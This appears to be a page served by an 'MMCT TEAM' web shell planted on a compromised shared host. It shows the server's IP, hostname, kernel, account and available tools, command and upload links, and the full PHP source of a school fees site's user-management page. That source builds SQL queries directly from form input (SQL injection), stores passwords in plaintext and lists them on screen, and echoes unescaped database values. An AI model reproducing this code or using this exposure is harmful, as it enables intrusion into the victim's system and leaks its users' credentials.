MMCT TEAM

Server IP : 2a02:4780:3:1493:0:3736:a38e:7 / Your IP : 216.73.216.139
Web Server : LiteSpeed
System : Linux sg-nme-web1393.main-hosting.eu 4.18.0-553.40.1.lve.el8.x86_64 #1 SMP Wed Feb 12 18:54:57 UTC 2025 x86_64
User : u926327694 ( 926327694)
PHP Version : 7.4.33
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF
Directory (0755) : /home/u926327694/domains/smsoft.in/public_html/demo/src/../img/../
[ Home ]	[ C0mmand ]	[ Upload File ]
Current File : /home/u926327694/domains/smsoft.in/public_html/demo/src/../img/../manage-users.php
<?php 

    // First we execute our common code to connection to the database and start the session 
    require("common.php"); 
     
    // At the top of the page we check to see whether the user is logged in or not 
    if(!isset($_SESSION['Mng_User'])) 
    { 
        // If they are not, we redirect them to the login page. 
        header("Location: login.php"); 
         
        // Remember that this die statement is absolutely critical.  Without it, 
        // people can view your members-only content without logging in. 
        die("Redirecting to login.php"); 
    } 
     
    // Everything below this point in the file is secured by the login system 
     
    // We can display the user's username to them by reading it from the session array.  Remember that because 
    // a username is user submitted content we must use htmlentities on it before displaying it to the user. 

?>


<?php include "config/config.php"; ?>
<!DOCTYPE html>
<html>
<head>
  <!-- start: Meta -->
  <meta charset="utf-8">
<title>Students List</title>  <meta name="description" content="Bootstrap Metro Dashboard">
  <meta name="author" content="Dennis Ji">
  <meta name="keyword" content="Metro, Metro UI, Dashboard, Bootstrap, Admin, Template, Theme, Responsive, Fluid, Retina">
  <!-- end: Meta -->
  
  <!-- start: Mobile Specific -->
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <!-- end: Mobile Specific -->
  
  <!-- start: CSS -->
  <link id="bootstrap-style" href="css/bootstrap.min.css" rel="stylesheet">
  <link href="css/bootstrap-responsive.min.css" rel="stylesheet">
  <link id="base-style" href="css/style.css" rel="stylesheet">
  <link id="base-style-responsive" href="css/style-responsive.css" rel="stylesheet">
  <link href='http://fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,800italic,400,300,600,700,800&subset=latin,cyrillic-ext,latin-ext' rel='stylesheet' type='text/css'>
  <!-- end: CSS -->
  

  <!-- The HTML5 shim, for IE6-8 support of HTML5 elements -->
  <!--[if lt IE 9]>
      <script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script>
    <link id="ie-style" href="css/ie.css" rel="stylesheet">
  <![endif]-->
  
  <!--[if IE 9]>
    <link id="ie9style" href="css/ie9.css" rel="stylesheet">
  <![endif]-->
    
  <!-- start: Favicon -->
  <link rel="shortcut icon" href="img/favicon.ico">
  <!-- end: Favicon -->
  
    <style type="text/css">
<!--
.style1 {
  color: #3300CC;
  font-weight: bold;
}
.style2 {
  color: #FF0000;
  font-weight: bold;
}
.style4 {
  color: #CC00FF;
  font-weight: bold;
}
-->
</style>
     <script src="https://code.jquery.com/jquery-3.3.1.js"></script>
 <script src="https://cdn.datatables.net/1.10.16/js/jquery.dataTables.min.js"></script>
 <script src="https://cdn.datatables.net/buttons/1.5.1/js/dataTables.buttons.min.js"></script>
 <script src="https://cdnjs.cloudflare.com/ajax/libs/jszip/3.1.3/jszip.min.js"></script>
 <script src="https://cdnjs.cloudflare.com/ajax/libs/pdfmake/0.1.32/pdfmake.min.js"></script>
 <script src="https://cdnjs.cloudflare.com/ajax/libs/pdfmake/0.1.32/vfs_fonts.js"></script>
 <script src="https://cdn.datatables.net/buttons/1.5.1/js/buttons.html5.min.js"></script>
<link rel="stylesheet" type="text/css" href="https://cdn.datatables.net/1.10.16/css/jquery.dataTables.min.css"/>
<link rel="stylesheet" type="text/css" href="https://cdn.datatables.net/buttons/1.5.1/css/buttons.dataTables.min.css"/>
    <script type="text/javascript">
    	$.fn.dataTable.ext.errMode = 'none';
        $(document).ready(function() {
    $('#example').DataTable( {
        dom: 'Bfrtip',
        buttons: [
            'copyHtml5',
            'excelHtml5',
            'csvHtml5',
            'pdfHtml5'
        ]
    } );
} );
                $(document).ready(function() {
    $('#example1').DataTable( {
        dom: 'Bfrtip',
        buttons: [
            'copyHtml5',
            'excelHtml5',
            'csvHtml5',
            'pdfHtml5'
        ]
    } );
} );
    $(document).ready(function() {
    $('#example2').DataTable( {
        dom: 'Bfrtip',
        buttons: [
            'copyHtml5',
            'excelHtml5',
            'csvHtml5',
            'pdfHtml5'
        ]
    } );
} );
     $(document).ready(function() {
    $('#example3').DataTable( {
        dom: 'Bfrtip',
        buttons: [
            'copyHtml5',
            'excelHtml5',
            'csvHtml5',
            'pdfHtml5'
        ]
    } );
} );
    $(document).ready(function() {
    $('#example4').DataTable( {
        dom: 'Bfrtip',
        buttons: [
            'copyHtml5',
            'excelHtml5',
            'csvHtml5',
            'pdfHtml5'
        ]
    } );
} );
    </script>
        <script src="js/jquery-migrate-1.0.0.min.js"></script>
    
    
        <script src="js/jquery-ui-1.10.0.custom.min.js"></script>
    
      <script src="js/jquery.ui.touch-punch.js"></script>
    
        <script src="js/modernizr.js"></script>
  <script src="js/bootstrap.min.js"></script>
    
          
         <script src="js/jquery.cookie.js"></script>
    
        <script src='js/fullcalendar.min.js'></script>
    
        

         <script src="js/excanvas.js"></script>
    <script src="js/jquery.flot.js"></script>
    <script src="js/jquery.flot.pie.js"></script>
    <script src="js/jquery.flot.stack.js"></script>
    <script src="js/jquery.flot.resize.min.js"></script>
    
        <script src="js/jquery.chosen.min.js"></script>
    
        <script src="js/jquery.uniform.min.js"></script>
        
        <script src="js/jquery.cleditor.min.js"></script>
    
        <script src="js/jquery.noty.js"></script>
    
        <script src="js/jquery.elfinder.min.js"></script>
    
        <script src="js/jquery.raty.min.js"></script>
    
        <script src="js/jquery.iphone.toggle.js"></script>
    
        <script src="js/jquery.uploadify-3.1.min.js"></script>
    
        <script src="js/jquery.gritter.min.js"></script>
    
        <script src="js/jquery.imagesloaded.js"></script>
    
        <script src="js/jquery.masonry.min.js"></script>
    
        <script src="js/jquery.knob.modified.js"></script>
    
        <script src="js/jquery.sparkline.min.js"></script>
    
        <script src="js/counter.js"></script>
    
        <script src="js/retina.js"></script>

        <script src="js/custom.js"></script>
</head>


<body onLoad="myFunction()">
		<!-- start: Header -->
	<?php 


	include "menu_f.php"; ?>
	<!-- start: Header -->
	
		<div class="container-fluid-full">
		<div class="row-fluid">
				
			<!-- start: Main Menu -->
			<div id="sidebar-left" class="span2">
				<div class="nav-collapse sidebar-nav">
					<ul class="nav nav-tabs nav-stacked main-menu">
						<li><a href="dashboard.php"><i class="icon-bar-chart"></i><span class="hidden-tablet"> Dashboard</span></a></li>	
						
						<?php include "menu.php"; ?>							
						
						
						
					</ul>
				</div>
			</div>
			<!-- end: Main Menu -->
			
			<noscript>
				<div class="alert alert-block span10">
					<h4 class="alert-heading">Warning!</h4>
					<p>You need to have <a href="http://en.wikipedia.org/wiki/JavaScript" target="_blank">JavaScript</a> enabled to use this site.</p>
				</div>
			</noscript>
			
			<!-- start: Content -->
			
					<div id="content" class="span10">
			
			
			<ul class="breadcrumb">
				<li>
					<i class="icon-home"></i>
					<a href="dashboard.php">Home</a> 
					<i class="icon-angle-right"></i>
				</li>
				<li><a href="#">Manage Users</a></li>
			</ul>

<div class="box-content">
<div class="row-fluid sortable">		
				<div class="box span12">
					<div class="box-header" data-original-title>
						<h2><i class="halflings-icon white user"></i><span class="break"></span>Add User<br><br></h2>
						<div class="box-icon">
							
						</div>
					</div>
					<div class="box-content" >
					
			<form action="" method="post" >		
			    <table border="0" align="center" style="width:100%;">
			        <tr>
			            <td>
			                <div class="form-group">
			                    <label>UserName</label>
			                    <input type="text" name="txtUserName" class="form-control SpecialNotAllow" required="required" />
			                </div>
			            </td>
			            <td>
			                <div class="form-group">
			                    <label>Password</label>
			                    <input type="text" name="txtpassword" class="form-control" required="required" pattern="(?=.*\d)(?=.*[a-z])(?=.*[A-Z]).{8,}" title="Must contain at least one number and one uppercase and lowercase letter, and at least 8 or more characters" />
			                </div>
			            </td>
			            <td>
			                <div class="form-group">
			                    <label>Modules</label>
			                    <select class="form-control ddlModules" name="ddlModules" required="required">
                                    <option value="">--Select--</option>
                                    <option value="Fees_Management">Fees Management</option>
                                    <option value="Account">Account Management</option>
                                    <option value="Student_Management">Student Management</option>
                                    <option value="Teacher">Teacher</option>
                                    <option value="Account_Views">Account Views</option>
                                </select>
                            </div>
			            </td>
			            <td>
			                <div class="form-group">
			                    <label>Select Year</label>
			                    <select class="form-control" name="PastYear">
                                    <option value="" selected='selected'>2023</option>
                                    <option value="_22">2022</option>
                                    <option value="_21">2021</option>
                                    <option value="_19">2019</option>
                                    <option value="_18">2018</option>
                                    <option value="_17">2017</option>
                                </select>
			                </div>
			            </td>
			                  
			            <td>
			                <div class="form-group">
			                    <label style="width:100%;">&nbsp;</label>
			                    <button class="btn btn-primary" name="btnAddUser">Submit</button>
			                </div>
			            </td>
			        </tr>
			        <tr class="user_permission" style="display:none;">
			            <td>
			                <label>
			                    <input class="checkbox" type="checkbox" name="user_permission[]" value="class_division" checked="checked" />Class / Division
			                </label>
			                <label>
			                    <input class="checkbox" type="checkbox" name="user_permission[]" value="head" checked="checked"  />Head
			                </label>
			                <label>
			                    <input class="checkbox" type="checkbox" name="user_permission[]" value="update_student" checked="checked"  />Update / View Student
			                </label>
			                <label>
			                    <input class="checkbox" type="checkbox" name="user_permission[]" value="pay_fees"  checked="checked" />Pay Fees
			                </label>
			                <label>
			                    <input class="checkbox" type="checkbox" name="user_permission[]" value="balance_reports" checked="checked"  />Balance Reports
			                </label>
			                <label>
			                    <input class="checkbox" type="checkbox" name="user_permission[]" value="discount" checked="checked"  />Discount
			                </label>
			            </td>
			            <td>
			                <label>
			                    <input class="checkbox" type="checkbox" name="user_permission[]" value="sub_head"  checked="checked" />Sub Head
			                </label>
			                <label>
			                    <input class="checkbox" type="checkbox" name="user_permission[]" value="fees_receipt_head" checked="checked"  />Fees Receipt Head
			                </label>
			                <label>
			                    <input class="checkbox" type="checkbox" name="user_permission[]" value="apply_fees_code" checked="checked"  />Apply Fees Code
			                </label>
			                <label>
			                    <input class="checkbox" type="checkbox" name="user_permission[]" value="payment_approve" checked="checked"  />Payment Approve
			                </label>
			                <label>
			                    <input class="checkbox" type="checkbox" name="user_permission[]" value="inventory"  checked="checked" />Inventory
			                </label>
			            </td>
			            <td>
			                <label>
			                    <input class="checkbox" type="checkbox" name="user_permission[]" value="bank" checked="checked"  />Bank
			                </label>
			                <label>
			                    <input class="checkbox" type="checkbox" name="user_permission[]" value="new_student"  checked="checked" />New Student
			                </label>
			                <label>
			                    <input class="checkbox" type="checkbox" name="user_permission[]" value="remove_fees_code" checked="checked"  />Remove Fees Code
			                </label>
			                <label>
			                    <input class="checkbox" type="checkbox" name="user_permission[]" value="daily_reports" checked="checked"  />Daily Reports
			                </label>
			                <label>
			                    <input class="checkbox" type="checkbox" name="user_permission[]" value="utility"  checked="checked" />Utility
			                </label>
			            </td>
			            <td>
			                
			            </td>
			        </tr>
			      </table>
			</form>
        </div>
    </div>
</div>
<div class="row-fluid sortable" >		
				<div class="box span12">
					<div class="box-header" data-original-title>
						<h2><i class="halflings-icon white user"></i><span class="break"></span>Users</h2>
						<div class="box-icon">
							
						</div>
					</div>
					<div class="box-content">
						<table  id="example" class="table table-striped table-bordered bootstrap-datatable datatable">
						  <thead>
							 <tr>
								  <th>UserName</th>
								  <th>Password</th>
								  <th>Module</th>
								  <th>Delete</th>
							  </tr>
						  </thead>   
						  <tbody>
						      <?php
						        $sel_user=mysqli_query($con,"select username,type,id,passwordText from users");
						        while($res_user=mysqli_fetch_array($sel_user))
						        {
						      ?>
							<tr>
								<td><?php echo $res_user['username'] ?></td>
							<td><?php echo $res_user['passwordText'] ?></td>
								<td><?php echo $res_user['type'] ?></td>
								<td>
								    <a href="delete-user.php?id=<?php echo $res_user['id'] ?>" onclick="return confirm('Are sure delete user ?')">Delete</a>
								</td>
							</tr>
							<?php
						        }
							?>
						  </tbody>
					  </table> 
 </div>
					 
	 

					
					</div> </div> </div>
							  	           
		
    

	</div>
			
			
			<!--/.fluid-container-->
	
			<!-- end: Content -->
		</div><!--/#content.span10-->
		</div><!--/fluid-row-->
		
	
	<div class="clearfix"></div>
	
	
	<div class="clearfix"></div>
	
		<footer>

		<p>
			<span style="text-align:left;float:left">&copy; 2018 <a href="http://evisioninfotech.in" alt="Bootstrap_Metro_Dashboard">e vision infotech</a></span>
			
		</p>

	</footer>
	
	<script type="text/javascript">
    $(function () {
        $(".SpecialNotAllow").keypress(function (e) {
            var keyCode = e.keyCode || e.which;

            var regex = /^[A-Za-z0-9]+$/;
 
            //Validate TextBox value against the Regex.
            var isValid = regex.test(String.fromCharCode(keyCode));
            if (!isValid) {
                return false;
            }
 
            return isValid;
        });
        
        $(".user_permission").hide();
        $(".ddlModules").change(function (e) {
            if($(this).val()=="Fees_Management")
            {
                $(".user_permission").show();
            }
            else
            {
                $(".user_permission").hide();
            }
        });
    });
</script>
</body>
</html>
<?php
    if(isset($_POST['btnAddUser']))
    {
        $username=$_POST['txtUserName'];
        $Spassword=$_POST['txtpassword'];
        $PastYear=$_POST['PastYear'];
        $Module=$_POST['ddlModules'];
        
        $salt = dechex(mt_rand(0, 2147483647)) . dechex(mt_rand(0, 2147483647));
        $password = hash('sha256', $Spassword . $salt);
        for($round = 0; $round < 65536; $round++) 
        { 
            $password = hash('sha256', $password . $salt); 
        }
        
        if($_POST['PastYear']==Date('y'))
        {
            $edit_permission=mysqli_query($con,"ALTER TABLE `users` CHANGE `email` `email` VARCHAR(255) NULL");
            $add_column=mysqli_query($con,"ALTER TABLE `users` ADD `passwordText` VARCHAR(255) NOT NULL AFTER `type`");
            if($edit_permission)
            {
                $insert=mysqli_query($con,"INSERT INTo users(username,password,type,passwordText,salt) VALUES ('$username','$password','$Module','$Spassword','$salt')");
                if($insert)
                {
                    if($Module=="Fees_Management")
                    {
                        $user_id=mysqli_insert_id($con);
                        $user_permission=$_POST['user_permission'];
                        foreach($user_permission as $menu)
                        {
                           mysqli_query($con,"INSERT INTo user_permission(user_id,menu,status) VALUES ($user_id,'$menu',1)");
                        }
                    }
                    echo"<script>alert('User has been added...'); window.location='manage-users.php';</script>";
                }
                else
                {
                    echo"<script>alert('Unable to add user...'); window.location='manage-users.php';</script>";
                }
            }
            else
            {
                echo"<script>alert('Unable to add user...'); window.location='manage-users.php';</script>";
            }
        }
        else
        {
            $dbYear = $_POST['PastYear'];
            require_once('config/rootphp.php');
            $rootObj=new rootphp();
            $rootObj->connect();
            $response=$rootObj->getFeesDB();
            $dbUsername = $response['dbUsernameFees'];
            $dbPassword = $response['dbPassword'];
            $dbName=$response['dbFees'];
            
            $new_con=mysqli_connect($servername,$dbUsername.$dbYear,$dbPassword,$dbName.$dbYear);
            if($new_con){
                $edit_permission=mysqli_query($new_con,"ALTER TABLE `users` CHANGE `email` `email` VARCHAR(255) NULL");
                $add_column=mysqli_query($new_con,"ALTER TABLE `users` ADD `passwordText` VARCHAR(255) NOT NULL AFTER `type`");
                if($edit_permission)
                {
                    $insert=mysqli_query($new_con,"INSERT INTo users(username,password,type,passwordText,salt) VALUES ('$username','$password','$Module','$Spassword','$salt')");
                    if($insert)
                    {
                        if($Module=="Fees_Management")
                        {
                            $user_id=mysqli_insert_id($new_con);
                            $user_permission=$_POST['user_permission'];
                            foreach($user_permission as $menu)
                            {
                               mysqli_query($new_con,"INSERT INTo user_permission(user_id,menu,status) VALUES ($user_id,'$menu',1)");
                            }
                        }
                        echo"<script>alert('User has been added...'); window.location='manage-users.php';</script>";
                    }
                    else
                    {
                        echo"<script>alert('Unable to add user...'); window.location='manage-users.php';</script>";
                    }
                }
                else
                {
                    echo"<script>alert('Unable to add user...'); window.location='manage-users.php';</script>";
                }
            }
            else{
                echo"<script>alert('Database Connection failed for past year contact to administrator...'); window.location='manage-users.php';</script>";
            }
        }
    }
?>
MMCT - 2023